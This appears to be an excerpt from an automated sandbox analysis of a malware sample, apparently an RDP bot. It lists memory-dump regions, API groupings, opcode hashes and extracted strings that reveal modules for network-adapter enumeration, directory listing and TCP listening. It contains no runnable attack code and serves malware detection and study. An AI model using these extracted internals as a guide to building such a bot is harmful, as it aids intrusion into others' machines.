                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModuleSleep
                                                                    • String ID:
                                                                    • API String ID: 1071907932-0
                                                                    • Opcode ID: ebcfc3099e72364c31fa6fcd18c915c859bbb365beea9433ade7ab1f37a8b2e3
                                                                    • Instruction ID: 0b68ba0052ac6b6b448d26eb1550a5b3514e18a7834c131c8b0ac4a950caaf2a
                                                                    • Opcode Fuzzy Hash: ebcfc3099e72364c31fa6fcd18c915c859bbb365beea9433ade7ab1f37a8b2e3
                                                                    • Instruction Fuzzy Hash: 74018122B1C643A2F7A05798F4503BA3391AF84384F540230F70ECB6A5DE6CD945C3C0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$Heap$FreeProcessfclosefread
                                                                    • String ID:
                                                                    • API String ID: 4240746492-0
                                                                    • Opcode ID: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
                                                                    • Instruction ID: e59c78108aa8da474fe7bd0af7132ba0c243d019dffb295b70a7391ee1beb2d7
                                                                    • Opcode Fuzzy Hash: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
                                                                    • Instruction Fuzzy Hash: ADE0DF01B6828321FF7009ED184073627812F9838AF161631EF0EE6AFADD3EE4010880
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$Heap$FreeProcessfclosefread
                                                                    • String ID:
                                                                    • API String ID: 4240746492-0
                                                                    • Opcode ID: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
                                                                    • Instruction ID: 8a897c47da5901dfd984cadcbd4fdd69add7944035ecec35440c024eeb5671a7
                                                                    • Opcode Fuzzy Hash: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
                                                                    • Instruction Fuzzy Hash: 77E0DF01B6829321FF7009ED044073627812F9838AF161630EF0EE6AFADD3EF4010880
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$Heap$FreeProcessfclosefread
                                                                    • String ID:
                                                                    • API String ID: 4240746492-0
                                                                    • Opcode ID: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
                                                                    • Instruction ID: ceb159f19a49f0fe612e6acc69c12bff2e7198a18634cc22e4c84c0c14e43d55
                                                                    • Opcode Fuzzy Hash: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
                                                                    • Instruction Fuzzy Hash: C9E0DF01B6829322FF7009ED044073627812F9838AF161631EF0EE6EFADD3EE4010880
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$Heap$FreeProcessfclosefread
                                                                    • String ID:
                                                                    • API String ID: 4240746492-0
                                                                    • Opcode ID: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
                                                                    • Instruction ID: 00a20c9e42362da19e4bd743fc4003566bef3ea1d44c65fb7ae8434415d9f6d0
                                                                    • Opcode Fuzzy Hash: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
                                                                    • Instruction Fuzzy Hash: BBE0DF01B6829321FF7009ED044073627813F9838AF161630EF0EE6AFADD3EE0010880
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$Heap$FreeProcessfclosefread
                                                                    • String ID:
                                                                    • API String ID: 4240746492-0
                                                                    • Opcode ID: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
                                                                    • Instruction ID: d7a4497e60c2b967a82263788b8c3c30564b1f9398e0bc18e4602e43ac80f4cd
                                                                    • Opcode Fuzzy Hash: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
                                                                    • Instruction Fuzzy Hash: 72E0DF01B6829321FF7009ED044073627812F9838BF161630EF0EE6AFADD3EE4010880
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$Heap$FreeProcessfclosefread
                                                                    • String ID:
                                                                    • API String ID: 4240746492-0
                                                                    • Opcode ID: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
                                                                    • Instruction ID: 3ff456d9810cdde9cecd787442d0ecf982112d8cff92938781857ce00761417d
                                                                    • Opcode Fuzzy Hash: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
                                                                    • Instruction Fuzzy Hash: 2AE0DF01B6829321FF7009ED044073627812F9838AF161630EF0EE6AFADD3EE4010880
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ServiceStatus
                                                                    • String ID:
                                                                    • API String ID: 3969395364-0
                                                                    • Opcode ID: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
                                                                    • Instruction ID: dace35e993a0230da1059648b873a9d4c3f70edca3cde9fb8b2dbf9fd9a96e11
                                                                    • Opcode Fuzzy Hash: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
                                                                    • Instruction Fuzzy Hash: E4D09E74D1DA02E5E7049F8DFC452243760FF59345F909235E30CD6230EE3C6155A780
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: rand_s
                                                                    • String ID:
                                                                    • API String ID: 863162693-0
                                                                    • Opcode ID: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
                                                                    • Instruction ID: eeffb8eb1e5502ebb128ea1b2162dff36881ae9c8a9ada85be0964e790a9c0d2
                                                                    • Opcode Fuzzy Hash: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
                                                                    • Instruction Fuzzy Hash: 52C04C76A18540DAD730DB24E8453597770F798308FD04211E65D826A4DF3CD61FCF44
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalEnterSection
                                                                    • String ID:
                                                                    • API String ID: 1904992153-0
                                                                    • Opcode ID: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
                                                                    • Instruction ID: 577923021f62a84cc450fc2b12bcfc820c37eea88e8fe73bf3fe5af8c4d76798
                                                                    • Opcode Fuzzy Hash: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
                                                                    • Instruction Fuzzy Hash: 55C08C50F1910AC2FB08A771B98103812206F9C700F001036C8EE42372CE1C98D94200
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AdaptersAllocInfo$Free
                                                                    • String ID: (adapter_num != NULL)$(pref_adapter_type != NULL)$H:/Projects/rdp/bot/codebase/net.c$[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetAdaptersInfo failed(res=%08lx)$[E] (%s) -> GetBestInterface failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$net_info
                                                                    • API String ID: 2437369060-1325175688
                                                                    • Opcode ID: c4b389ba31edfb4235e2faf3d76b78466cef202fedc40949f5a608255a9b2779
                                                                    • Instruction ID: 493469b58c19a282c6e81dbcaaf53cc88b58bf77165f136a0dd27448c7a42a42
                                                                    • Opcode Fuzzy Hash: c4b389ba31edfb4235e2faf3d76b78466cef202fedc40949f5a608255a9b2779
                                                                    • Instruction Fuzzy Hash: 25519E61A0CE8795FB519B97E8402FC3BA9EF407A4F4490B9DD4E4A2B5EF2CE509C701
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AdaptersAllocInfo$Free
                                                                    • String ID: (adapter_num != NULL)$(pref_adapter_type != NULL)$H:/Projects/rdp/bot/codebase/net.c$[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetAdaptersInfo failed(res=%08lx)$[E] (%s) -> GetBestInterface failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$net_info
                                                                    • API String ID: 2437369060-1325175688
                                                                    • Opcode ID: 4f5f0cc951ae45094fc637e6965b0814f4cb49fe721a5e20e3c067c32e2aedff
                                                                    • Instruction ID: 896879bf60f32be7526bae57bef0c10ff79cd27eb0e065f108a4fb3276ecd827
                                                                    • Opcode Fuzzy Hash: 4f5f0cc951ae45094fc637e6965b0814f4cb49fe721a5e20e3c067c32e2aedff
                                                                    • Instruction Fuzzy Hash: 40518165B19E47CDFB509B12E8402BC6260EF643A4F4441B2EA6D672B7DF7CE905C708
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                    • API String ID: 4253334766-243243391
                                                                    • Opcode ID: f8625e955fff89667d247409aa7d3db8d320962ed57fa589470bc2c6b3cc2cab
                                                                    • Instruction ID: 126f6fb474a4aff202fa324fe6c3781662e25045bdb432db696cee861b027256
                                                                    • Opcode Fuzzy Hash: f8625e955fff89667d247409aa7d3db8d320962ed57fa589470bc2c6b3cc2cab
                                                                    • Instruction Fuzzy Hash: 62614E61E2CE4785FB61579BA4403BC2259AF0237CF5445B6E86E4B2F4DF6CAD84C341
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                    • API String ID: 4253334766-243243391
                                                                    • Opcode ID: 2845b522941af9ab75104b2202be28022406719c9b8ff0641e5ffd3905ec8be1
                                                                    • Instruction ID: d015aad1fbfa1cfa0e215f93017c8cd0e2858722e2d58168c775cede6c61d03d
                                                                    • Opcode Fuzzy Hash: 2845b522941af9ab75104b2202be28022406719c9b8ff0641e5ffd3905ec8be1
                                                                    • Instruction Fuzzy Hash: E8612921E0CD47C9FA619756A4443BE6250AF213B4F8401B2D87E7B2F6DE2CED85934E
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                                                                    • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                                                                    • API String ID: 3590747132-3524496754
                                                                    • Opcode ID: afa8c42d7f831cd4f541fde3ac05e9aee93dd1237987719d3c8deea0743bee77
                                                                    • Instruction ID: d2c52e159b6847a485f8a0b9245454aa1258b11281f72c99159861b49b678338
                                                                    • Opcode Fuzzy Hash: afa8c42d7f831cd4f541fde3ac05e9aee93dd1237987719d3c8deea0743bee77
                                                                    • Instruction Fuzzy Hash: DE31B3A1A09E0281E7209FABE8401B93799BF457B4F0413B9D97E436F0EF7CE4058702
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (data != NULL)$(len > 0)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$crc32
                                                                    • API String ID: 0-3120737415
                                                                    • Opcode ID: e581f0dd049c155bafc1dc3438cacaeb545f5819b0f2d1f7c41a45a99955d4e8
                                                                    • Instruction ID: c0504225bf0cf5cbd51d11e2698fe071eb124d4b80e765fb66aa4e6f6a44b7a4
                                                                    • Opcode Fuzzy Hash: e581f0dd049c155bafc1dc3438cacaeb545f5819b0f2d1f7c41a45a99955d4e8
                                                                    • Instruction Fuzzy Hash: 601191A1908D8785EB11CB86E8403FC2B6BFF453A5F8191B6D50D536B1CFBCA14AC344
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (data != NULL)$(len > 0)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$crc32
                                                                    • API String ID: 0-3120737415
                                                                    • Opcode ID: e5a641f4f4568fa5537a465d6ef1cf63843c61f9523ec9842464458d8ba22ecd
                                                                    • Instruction ID: d6cb196561422d16ea0229d68f02f31a8d39f15b35d27d5b87f917af59038a5a
                                                                    • Opcode Fuzzy Hash: e5a641f4f4568fa5537a465d6ef1cf63843c61f9523ec9842464458d8ba22ecd
                                                                    • Instruction Fuzzy Hash: 731142A0D08D87C9EA50CB53A8003F927B1FF66365F8042B2D56D761B6CF3CA106C748
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eddfeba3403210edebded81f2e7352dbb37a411731a4da1b037d3eac54097d24
